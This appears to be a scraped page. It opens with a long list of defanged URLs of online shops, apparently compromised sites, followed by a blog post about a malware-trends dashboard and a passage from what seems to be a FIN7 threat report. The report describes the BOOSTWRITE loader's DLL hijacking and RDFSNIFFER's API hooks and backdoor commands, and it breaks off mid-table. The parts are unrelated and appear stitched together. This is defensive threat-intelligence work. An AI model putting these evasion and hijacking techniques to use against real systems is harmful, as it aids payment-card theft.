      URL: http://www.]descontosemhoteis.]com.]br/
      URL: http://garudakart.]com/
      URL: http://jutebazaar.]com/
      URL: http://www.]leilachodo.]com/
      URL: http://newstudytour.]com/
      URL: http://www.]zamarimarcondes.]com.]br/
      URL: http://fisiolifepilates.]com.]br/
      URL: https://dload.]com.]br/
      URL: http://hotelcathedrale.]be/
      URL: http://kiiroousa.]com/
      URL: http://designbookshop.]in/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]baleyo.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://oomph.]com.]sg/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://www.]britoil.]co.]uk/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://english-furniture.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]matexbuyer.]com/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://aquasport.]sigmacell.]in/
      URL: http://hotelcathedrale.]be/
      URL: http://worldstogether.]com/
      URL: http://www.]matexbuyer.]com/
      URL: https://www.]arenaflorist.]com/
      URL: http://www.]blendystraw.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://only16.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]arquegym.]com.]br/
      URL: http://hotelcathedrale.]be/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]paudicesrl.]it/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]reviewlista.]com/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]kupu.]es/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/
      URL: http://www.]nurserydecalsandmore.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://only16.]net/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: http://www.]mynumberplates.]com/
      URL: https://myphonetics.]com/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://www.]opticalsupplies.]com/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://www.]britoil.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]doftec.]com/
      URL: http://garudakart.]com/
      URL: http://legalprintllc.]com/
      URL: http://lukasandlara.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://stonemanasia.]com/
      URL: http://stonemanasia.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://myphonetics.]com/
      URL: http://alltradeshowdisplay.]com/
      URL: http://www.]virmans.]com/
      URL: http://www.]gramton.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://magescore.]com/
      URL: http://www.]thevintagegrapes.]com/
      URL: http://english-furniture.]co.]uk/
      URL: http://stonemanasia.]com/
      URL: http://jacksvapes.]com/
      URL: http://unsquashaball.]com/
      URL: https://www.]eyewear69.]my/
      URL: http://www.]vandrugboards.]com/
      URL: http://qandmantiqueluxury.]com/
      URL: http://hivepackaging.]com/
      URL: http://www.]4d-printology.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://diamondwrapfactory.]com/
      URL: http://petanyway.]net/index.%5Dphp/why-not-available/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]lobsters.]com.]sg/
      URL: https://www.]arenaflorist.]com/
      URL: http://www.]mrsflorist.]co.]in/
      URL: http://www.]loosen-up.]com/
      URL: http://labdooshoes.]com/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]paudicesrl.]it/
      URL: http://hotelcathedrale.]be/
      URL: http://eshop.]wengthyelot54.]com/
      URL: https://mustardoc.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://electroshopnow.]com/
      URL: http://kmmachinery.]com/
      URL: http://kmglasstools.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://dealelement.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]xentogo.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://shoefactoryindia.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://solarinfrasystems.]com/
      URL: https://electroshopnow.]com/
      URL: https://www.]macroman.]in/
      URL: http://juwelier-tarasek.]de/
      URL: https://dourosoptika.]gr/
      URL: https://www.]straightfromfarmers.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]uiterkits.]com/
      URL: http://de-lices.]ru/
      URL: http://hotelcathedrale.]be/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://rpkorea.]com/
      URL: https://www.]sellsspares.]com/
      URL: http://www.]fashionaxe.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://fenxiangheaven.]com/
      URL: http://www.]i91cloud.]com/
      URL: https://www.]ikonmotorsports.]com/
      URL: https://gorusticx.]com/
      URL: http://www.]lobsters.]com.]sg/
      URL: http://www.]ororganicliving.]com/
      URL: http://www.]lifestylea-list.]com/
      URL: http://www.]grovz.]com/
      URL: http://diamondwrapfactory.]com/
      URL: http://omniscrubs.]com/
      URL: http://www.]4d-printology.]com/
      URL: http://www.]northhillco.]com/
      URL: http://devdantona.]com/
      URL: http://deeprosso.]com/
      URL: http://www.]fashionaxe.]com/
      URL: http://www.]iousi.]com.]cn/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://only16.]net/
      URL: http://www.]eurekacosmetics.]com/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]virmanishop.]com/
      URL: http://goofballstuff.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://om10.]ru/
      URL: http://www.]nurserydecalsandmore.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
      URL: http://hotelcathedrale.]be/
      URL: https://www.]ikonmotorsports.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]cityflorist.]co.]in/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://goldwithyou.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://herbaloja.]online/
      URL: http://www.]surprise.]ps/
      URL: http://hotelcathedrale.]be/
      URL: http://store.]curiousinventor.]com/
      URL: http://www.]magento.]flyermonster.]de/
      URL: http://hotelcathedrale.]be/
      URL: https://deals4kart.]com/
      URL: http://academycreative.]cz/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://cuberra.]eu/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]smclinic.]bg/
      URL: http://shoefactoryindia.]com/
      URL: http://www.]fiskrose.]com/
      URL: https://myworldphone.]com/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]kevinbuou.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
      URL: https://deals4kart.]com/
      URL: http://www.]fangshicube.]com/
      URL: http://www.]gpmbv.]com/
      URL: http://va-store.]de/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://jewelsofdesert.]com/
      URL: http://www.]khadioutlet.]com/
      URL: http://lequeens.]com/
      URL: http://stilprinzessin.]com/
      URL: http://www.]doreall.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]fangshicube.]com/
      URL: http://luggagemama.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://cyprusitstore.]com/
      URL: https://deals4kart.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
      URL: http://hotelcathedrale.]be/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]britoil.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]chirobuddy.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]electricalswholesale.]co.]uk/
      URL: http://www.]matexbuyer.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: https://www.]straightfromfarmers.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]doreall.]com/
      URL: https://pinkime.]com/
      URL: https://www.]websun.]us/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://store.]curiousinventor.]com/guides/Surface_Mount_Soldering/Tools
      URL: http://www.]electricalswholesale.]co.]uk/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: http://magesource.]su/
      URL: http://magesource.]su/
      URL: http://magesource.]su/
      URL: http://only16.]net/
      URL: http://labdooshoes.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://om10.]ru/
      URL: http://lequeens.]com/
      URL: http://www.]athleticmmagear.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]almosauto.]in/
      URL: http://douspeakgreen.]in/
      URL: http://www.]eurekacosmetics.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://coripa.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]tribalasia.]com.]my/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]xinginroo.]com/
      URL: http://magesource.]su/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]supritam.]com/
      URL: http://magesource.]su/
      URL: http://store.]curiousinventor.]com/
      URL: http://www.]blendystraw.]com/
      URL: http://www.]barcoderfidstore.]com/
      URL: http://douspeakgreen.]in/
      URL: http://fashionfromla.]com/
      URL: http://seasonallivingokc.]com/
      URL: http://floorzndoorz.]com/
      URL: http://formula-depot.]com/
      URL: http://zigoh.]com/
      URL: https://www.]baleyo.]com/
      URL: http://luggagemama.]com/
      URL: http://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: http://emediks.]com/store/
      URL: http://www.]fashionaxe.]com/
      URL: http://schrikdraad.]nu/
      URL: http://www.]liquidfillingpastefilling.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://bymatty.]com/
      URL: http://www.]sclabrine.]com/
      URL: https://www.]bluecactus.]co/
      URL: http://fashionavenue.]ma/
      URL: http://yesforlov.]sk/
      URL: https://vytunuj.]sk/
      URL: http://www.]nflskjor.]com/
      URL: http://www.]acolortree.]com/
      URL: https://cobrafashions.]com/
      URL: http://www.]wondershop.]in/
      URL: http://sockitupsocks.]com/
      URL: http://richbumlife.]com/
      URL: http://gypsygfashionaccessories.]com/
      URL: https://www.]bvsecurity.]com/
      URL: http://www.]fiskrose.]com/
      URL: https://espacomanix.]com.]br/
      URL: http://www.]nixim3dpuzzle.]com/
      URL: http://www.]almosauto.]in/
      URL: http://www.]mage-apps.]de/
      URL: http://budstok.]com.]ua/
      URL: http://stage.]citizencashmere.]com/
      URL: http://www.]nitazdesign.]com/
      URL: http://goldwithyou.]com/
      URL: http://chkmaid.]com/
      URL: http://www.]mattiaus.]com/
      URL: http://www.]hcgsci.]com/
      URL: http://eshop.]wengthyelot54.]com/
      URL: http://bartonwest.]com/
      URL: http://gravurator.]de/
      URL: http://platz.]com.]ua/
      URL: https://5eboard.]com/
      URL: http://khadder.]in/
      URL: https://novnation.]com/
      URL: https://www.]taptye.]com/
      URL: https://seelar.]com/
      URL: http://www.]1quickcomp.]com/
      URL: http://pinul.]com/
      URL: http://www.]99materials.]com/
      URL: http://southernvapor.]com/
      URL: http://www.]pejenterprisesinc.]com/
      URL: http://www.]ejoyeeta.]com/
      URL: http://www.]retailsigningsolutions.]com/
      URL: http://www.]fyringe.]com/
      URL: http://www.]suninbox.]co.]uk/
      URL: http://www.]gohoyo.]com/
      URL: http://eveday.]com/
      URL: https://www.]el-taller.]pe/
      URL: https://www.]dazzstyle.]com/
      URL: http://montecitocaviar.]com/
      URL: http://www.]togotelecom.]ca/
      URL: http://swimresearch.]com/
      URL: https://eighteditions.]com/
      URL: https://srmall.]net/
      URL: https://hyperstrength.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://deltanineclothing.]com/
      URL: http://www.]storerab.]com/
      URL: http://floorzndoorz.]com/
      URL: http://4girlsaccessories.]com/
      URL: http://www.]cityflorist.]co.]in/
      URL: http://faithandflags.]com/
      URL: https://www.]theaugustco.]com/
      URL: http://francomotorsports.]com/
      URL: http://www.]reviewlista.]com/
      URL: http://www.]luckystarparty.]com/
      URL: http://www.]interprice.]mx/
      URL: http://www.]xxlgrip.]com/
      URL: http://avstamps.]com/
      URL: https://www.]baleyo.]com/
      URL: http://www.]905wood.]com/
      URL: https://www.]macroman.]in/
      URL: http://cuberra.]eu/
      URL: https://www.]velmo.]com/
      URL: https://wonderna.]com/
      URL: http://www.]spectrumlites.]co.]in/
      URL: http://kupi-present.]ru/
      URL: http://plumbedright.]com/
      URL: http://equibuy.]es/
      URL: https://www.]tec-heads.]com/
      URL: http://advancehealthproducts.]com.]au/
      URL: http://www.]inflatable-zone.]org/
      URL: https://dermagold.]sg/
      URL: http://www.]ibericos.]es/
      URL: http://worldstogether.]com/
      URL: http://www.]reflect-store.]com/
      URL: http://www.]kaajalsarees.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]benzin-im-blut.]com/
      URL: http://www.]ladago.]co.]uk/
      URL: http://clonadipet.]com.]br/
      URL: http://www.]louboutinuk.]co.]uk/
      URL: https://onestophairandbeauty.]ie/
      URL: http://www.]jensalwholesale.]com/
      URL: https://www.]chirobuddy.]net/
      URL: http://tile.]tilesandiego.]com/
      URL: https://morrio.]com/
      URL: http://cadresrobain.]fr/
      URL: http://www.]petzy.]com.]au/
      URL: http://www.]dysin.]com/
      URL: http://buyvipbaby.]com/login/
      URL: http://www.]olisano.]com/
      URL: http://www.]thevintagegrapes.]com/
      URL: http://www.]ludoville.]it/
      URL: http://zigoh.]com/
      URL: http://usacontainergroup.]com/
      URL: https://www.]clinicallearning.]com/index.%5Dphp/
      URL: http://www.]farmcraft.]at/
      URL: http://www.]poyood.]com/
      URL: http://euromigracija.]lt/
      URL: http://goofballstuff.]com/
      URL: https://www.]enlivenglobal.]com/
      URL: http://www.]turyagatea.]com/
      URL: http://creekfire.]com/
      URL: http://nowknow.]ch/
      URL: http://vkconline.]com/
      URL: https://trinitysurvival.]com/
      URL: http://www.]eboxim.]com/
      URL: http://www.]ilovedelfruito.]com/
      URL: http://www.]danatsouq.]com/
      URL: https://www.]callidae.]com/
      URL: https://www.]tramit.]it/
      URL: http://jjnc.]com.]hk/
      URL: http://shop.]taketime.]ch/
      URL: https://lacnehry.]sk/
      URL: https://ibercorte.]com/
      URL: http://www.]macmax.]com/uk/
      URL: http://www.]raquelrecargas.]com.]br/
      URL: http://www.]hotsca.]com/
      URL: http://www.]jarab.]london/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://start-finish.]ru/
      URL: http://www.]officiel.]it/
      URL: http://www.]isbbookstore.]com/
      URL: http://www.]krirob.]nu/
      URL: http://www.]eurekacosmetics.]com/
      URL: http://kupu.]es/
      URL: http://en.]lileauxbrocantes.]com/nouveautes.%5Dhtml
      URL: http://girlsandpearls.]com/
      URL: https://www.]websun.]us/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://piese-gm.]ro/
      URL: http://www.]diamondsnyou.]com/
      URL: http://ccgobuy.]com/
      URL: http://olenobra.]com/
      URL: https://www.]eternis.]pt/
      URL: http://infcollection.]com/
      URL: http://lojamundodosgames.]com/
      URL: http://purplebluepublishing.]com/
      URL: https://www.]autowheelexperts.]com/
      URL: https://www.]gizell.]ro/
      URL: http://smalldogsdepot.]com/
      URL: http://www.]hessiansantasacks.]co.]uk/
      URL: http://laborisfarma.]pl/
      URL: http://fashionfromla.]com/
      URL: https://www.]sellsspares.]com/
      URL: http://www.]soothnshine.]com/
      URL: http://jacksvapes.]com/
      URL: https://www.]richgromart.]com/
      URL: http://www.]safetreksales.]com/
      URL: http://ibundo.]de/
      URL: http://www.]megamojster.]si/
      URL: http://rpkorea.]com/
      URL: http://discountadda.]com/
      URL: http://www.]enotecaosteriaroma.]it/
      URL: http://nopainnomusa.]com/
      URL: https://www.]shopforsaundarya.]com/
      URL: http://accessoriesdeluxe.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://www.]ghulamali.]com.]pk/
      URL: http://www.]hardshot.]fr/
      URL: http://countrystorecampinas.]com.]br/
      URL: http://p-d-r.]ru/
      URL: http://demo.]freelunchlabs.]com/
      URL: http://atopmall.]kr/
      URL: http://hurtsilvermagic.]pl/customer/account/login/
      URL: https://www.]afsr-simivalley-shop.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://produtosprofissionais.]com.]br/
      URL: https://my.]nutis.]com/
      URL: https://www.]smclinic.]bg/
      URL: https://www.]wisesolutions.]net/
      URL: https://davillblinds.]com/
      URL: https://minervamedical.]ca/
      URL: http://gamsjaga.]com/
      URL: https://jceracing.]com/
      URL: http://dhyanaa.]com/
      URL: https://weloveheipoa.]com/
      URL: http://www.]advanced-pixel-shuttle.]com/
      URL: http://allright.]dp.]ua/
      URL: http://trueitglobal.]com/
      URL: http://www.]nandndesign.]com/
      URL: http://antaraxnm.]com/
      URL: http://www.]petitkreativ.]at/
      URL: https://www.]crowngroup.]net.]au/shop/
      URL: http://vanquish.]co.]in/
      URL: http://www.]esde.]ro/
      URL: https://liquidlightglows.]com/
      URL: http://shop.]littleashford.]co.]za/
      URL: https://lens4us.]com/
      URL: https://www.]westernelitejewelry.]com/
      URL: http://www.]mobilprices.]com/
      URL: http://blitarzoneid.]blogspot.]com/
      URL: http://kraftitude.]com/
      URL: http://grupocyber.]net/
      URL: http://elektro-wols.]kompass-media.]eu/
      URL: http://classico.]nextmp.]net/
      URL: http://www.]nationaltiledistribution.]com/
      URL: http://bloomingtrails.]com/
      URL: http://redcellmedical.]com/
      URL: http://patesting.]ie/
      URL: http://www.]bysicilia.]it/
      URL: http://kibellariding.]com/
      URL: https://www.]ladoudounesolde.]com/
      URL: http://www.]anjelskedarceky.]sk/
      URL: https://poolstore.]com.]au/
      URL: http://sklepsilvermagic.]pl/
      URL: http://www.]uebuys.]com/
      URL: http://www.]reynsaon.]com/
      URL: http://eshop.]javwireless.]com/
      URL: http://alphafxtestbooster.]com/
      URL: https://decor-boutique.]com/
      URL: http://www.]kevinbuou.]com/
      URL: https://www.]aioma.]it/
      URL: http://luxuryjewelleryto.]com/
      URL: http://www.]angcoshop.]com/
      URL: https://www.]vayobv.]com/
      URL: http://de-lices.]ru/
      URL: https://democanopy.]com/
      URL: https://mustardoc.]com/
      URL: http://www.]gourmetgallery.]sk/
      URL: http://fetchscripts.]com/
      URL: http://ballcancersucks.]com/
      URL: https://xtremevisionhid.]com/
      URL: http://www.]brushncanvas.]com/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://www.]haitralled.]com/
      URL: https://hanarovendas.]com.]br/
      URL: http://www.]plasticrewards.]com/
      URL: http://www.]universalbumpkeys.]com/
      URL: http://zuzugadgets.]com/
      URL: https://freshyeat.]com/
      URL: http://alch.]it/
      URL: http://asap.]co.]in/
      URL: https://www.]majesticlightinginc.]com/
      URL: https://www.]1by1shop.]com/
      URL: https://www.]kitauto.]pt/
      URL: http://sandoggrus.]dk/
      URL: http://www.]shieldmans.]com/
      URL: http://zapal.]com.]ua/
      URL: https://www.]farmaciabovisa.]it/
      URL: http://gurmanebi.]com/
      URL: http://www.]sportlowcost.]it/
      URL: http://www.]minopuntomoda.]com/
      URL: http://mstech.]com.]au/
      URL: http://magegaga.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://shop-camera.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://alltradeshowdisplay.]com/
      URL: http://hikvision-ir.]com/
      URL: http://shop-camera.]com/
      URL: http://homelykart.]com/
      URL: https://www.]bvsecurity.]com/
      URL: http://mebli-z.]com/
      URL: https://mustardoc.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://www.]gramton.]com/
      URL: http://usacontainergroup.]com/
      URL: http://tile.]tilesandiego.]com/
      URL: http://bartonwest.]com/
      URL: https://www.]dazzstyle.]com/
      URL: https://minervamedical.]ca/
      URL: http://www.]inflatable-zone.]org/
      URL: http://www.]ilovedelfruito.]com/
      URL: http://www.]hotsca.]com/
      URL: http://www.]uebuys.]com/
      URL: http://girlsandpearls.]com/
      URL: http://obeikandl.]com/
      URL: http://thanhloc1.]com/
      URL: http://seasonallivingokc.]com/
      URL: https://www.]macroman.]in/
      URL: https://www.]petremedies.]co.]uk/
      URL: http://www.]hessiansantasacks.]co.]uk/
      URL: http://naturagladlife.]com/
      URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
      URL: https://commercialpoolandspasupplies.]com/
      URL: http://www.]sclabrine.]com/
      URL: http://www.]quimex.]com.]ar/
      URL: http://lojamundodosgames.]com/
      URL: http://om10.]ru/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://www.]suninbox.]co.]uk/
      URL: https://www.]vayobv.]com/
      URL: http://www.]louboutinuk.]co.]uk/
      URL: https://www.]ikonmotorsports.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]eternis.]pt/
      URL: http://www.]arquegym.]com.]br/
      URL: http://fetchscripts.]com/
      URL: http://petit-univers.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://ledrus.]co.]nz/
      URL: http://obeikandl.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://net-istore.]ro/
      URL: http://www.]mrsflorist.]co.]in/
      URL: http://shop-camera.]com/

      Cyber Threat Trends Dashboard

      Introduction

      Information sharing is one of the most important activity that cybersecurity researchers do on daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most of the infosharing activities involved in cybersecurity are mostly focused on Indicator of Compromise such as: URL, IPs, Domains and file hashes which are perfectly used to arm protection tools such as: proxies, ng-firewalls and Antivirus Engines.

      Collecting and analyzing public available samples every single day I became more and more interested on the Cyber threats evolution (Cyber Threats Trend) rather than specific single analyses, which after hundreds of them, could get bored (no more emotion in analyzing the next Ransomware or a new Emotet version 😛 ). Regarding APT well it’s another cup of tea (a lot of passion in understanding next steps in there). So I decided to develop a super simple dashboard showing in real time (as soon as I get analyses done) the threat trends that are observed over days. The dashboard is available HERE (on top menu TOOLS => Cyber Threat Trends). So far only few basic information are showed, if you would like to see more stats/graph/infos, please feel free to contact me (HERE).

      Description

      Aim of this dashboard is to monitor trends over thousands even millions of samples providing quantitative analyses on what has observed during the performed automatic analyses. The data in this dashboard is totally auto-generated without control and with no post-processing. You should consider it as raw-data where you can start to elaborate your own research and eventually where you can apply your personal filters or considerations. If you do that, you should be aware that false positives could be behind the corner Let’s move on the current graphs and let’s try to explain what I’d like to show with them but before getting in you should be aware that all the digits on the graphs are expressing percentages and not absolute numbers. Now let’s dig a little bit on them.

      • Malware Families Trends. Detection distribution over time. In other words what are time-frames in where specific families are most active respect to others.
      • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families, this happens when no signatures match the samples or if multiple family signatures match the same sample. In both ways I am not sure where the sample belong with, so it would be classified as “unknown” and not visualized on this graph. Missing slice of the cake is attributed to “unknown”.
      • Distribution Types. Based on the magic file bytes this graph would track the percentages of file types that Malware used as carrier.
      • Threat Level Distribution. From 0 to 3 is getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand if hidden in unknown families Malware or false positives would hide. For such a reason a dedicated graph named Unknown Families Threat Level Distribution has created.
      • TOP domains, TOP processes and TOP File Names. With a sliding window of 300 last analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in that fields, by meaning you could probably find as TOP domain “google.com” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and took to your attention. Same cup of tea with processes and file names.Indeed those fields are include the term “involved” into their title, if something is involved it does not mean that it is malicious , but that it is accounted to be in a malicious chain.

      Conclusion

      The introduced dashboard is part of my cybersecurity community contribution as every free tool released on the “Tools” menu box. Cyber Threat Trends dynamically evolves over time and you might find it useful to ask questions about live statistics on cybersecurity threats. If you are a journalist or a cybsec passionate you might find some answers to trending questions to be elaborated over time.

      Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques

      During several recent incident response engagements, FireEye Mandiant investigators uncovered new tools in FIN7’s malware arsenal and kept pace as the global criminal operators attempted new evasion techniques. In this blog, we reveal two of FIN7’s new tools that we have called BOOSTWRITE and RDFSNIFFER.

      The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.

      RDFSNIFFER, a payload of BOOSTWRITE, appears to have been developed to tamper with NCR Corporation's “Aloha Command Center” client. NCR Aloha Command Center is a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. The malware loads into the same process as the Command Center process by abusing the DLL load order of the legitimate Aloha utility. Mandiant provided this information to NCR.

      BOOSTWRITE Loader: Where You At?

      BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

      Once loaded, `DWrite.dll` connects to a hard-coded IP and port from which it retrieves a decryption key and initialization vector (IV) to decrypt two embedded payload DLLs. To accomplish this task, the malware first generates a random file name to be used as a text log under the current user's %TEMP% directory; this filename starts with ~rdf and is followed by a set of random numbers. Next, the malware scans its own image to find the location of a 32-byte long multi-XOR key which is used to decode data inside its body. Part of the decoded data is an IP address and port which are used to retrieve the key and the IV for the decryption of the embedded payloads. The encryption algorithm uses the ChaCha stream cipher with a 256-bit key and 64-bit IV.

      Once the key and the IV are downloaded the malware decrypts the embedded payloads and performs sanity checks on the results. The payloads are expected to be PE32.DLLs which, if the tests pass, are loaded into memory without touching the filesystem.

      The malware logs various plaintext messages to the previously created logfile %TEMP%\~rds<rnd_numbers> which are indicative of the loader’s execution progress. An example of the file content is shown in Figure 1:

      Loading...
      Starting...
      Init OK
      Key OK
      Data: 4606941
      HS: 20
      K:[32] V:[8]
      DCnt: 732642317(ERR)

      Figure 1: BOOSTWRITE log file

      Before exiting, the malware resolves the location of the benign DWrite.dll library and passes the execution control to its DWriteCreateFactory method.

      The malware decrypts and loads two payload DLLs. One of the DLLs is an instance of the CARBANAK backdoor; the other DLL is a tool tracked by FireEye as RDFSNIFFER which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

      RDFSNIFFER Module: We Smell a RAT

      RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via NCR Corporation’s ‘Aloha Command Center Client’ (RDFClient), an application designed to provide visibility and system management capabilities to remote IT techs. RDFSNIFFER loads into the same process as the legitimate RDFClient by abusing the utility’s DLL load order, launching each time the ‘Aloha Command Center Client’ is executed on an impacted system.

      When the RDFSNIFFER module is loaded by BOOSTWRITE it hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface (Table 1). Furthermore, this enables the malware to alter the user’s last input time to ensure application sessions do not time out.

      Win32 API Function

      Hook Description

      CertVerifyCertificateChainPolicy

      Used to man-in-the-middle SSL sessions

      CertGetCertificateChain

      Used to man-in-the-middle SSL sessions

      WSAConnect

      Used to man-in-the-middle socket connections

      connect

      Used to man-in-the-middle socket connections

      ConnectEx

      Used to man-in-the-middle socket connections

      DispatchMessageW

      Used to hijack the utility's UI

      DispatchMessageA

      Used to hijack the utility's UI

      DefWindowProcW

      Used to hijack the utility's UI

      DefWindowProcA

      Used to hijack the utility's UI

      GetLastInputInfo

      Used to change the user's last input time (to avoid timed lock outs)

      Table 1: RDFSNIFFER’s Hooked Win32 API Functions

      This module also contains a backdoor component that enables it to inject commands into an active RDFClient session. This backdoor allows an attacker to upload, download, execute and/or delete arbitrary files (Table 2).

      Command Name

      Legit Function in RDFClient

      RDFClient Command ID

      Description

      Upload

      FileMgrSendFile

      107

      Uploads a file to the remote system

      Download

      FileMgrGetFile

      108

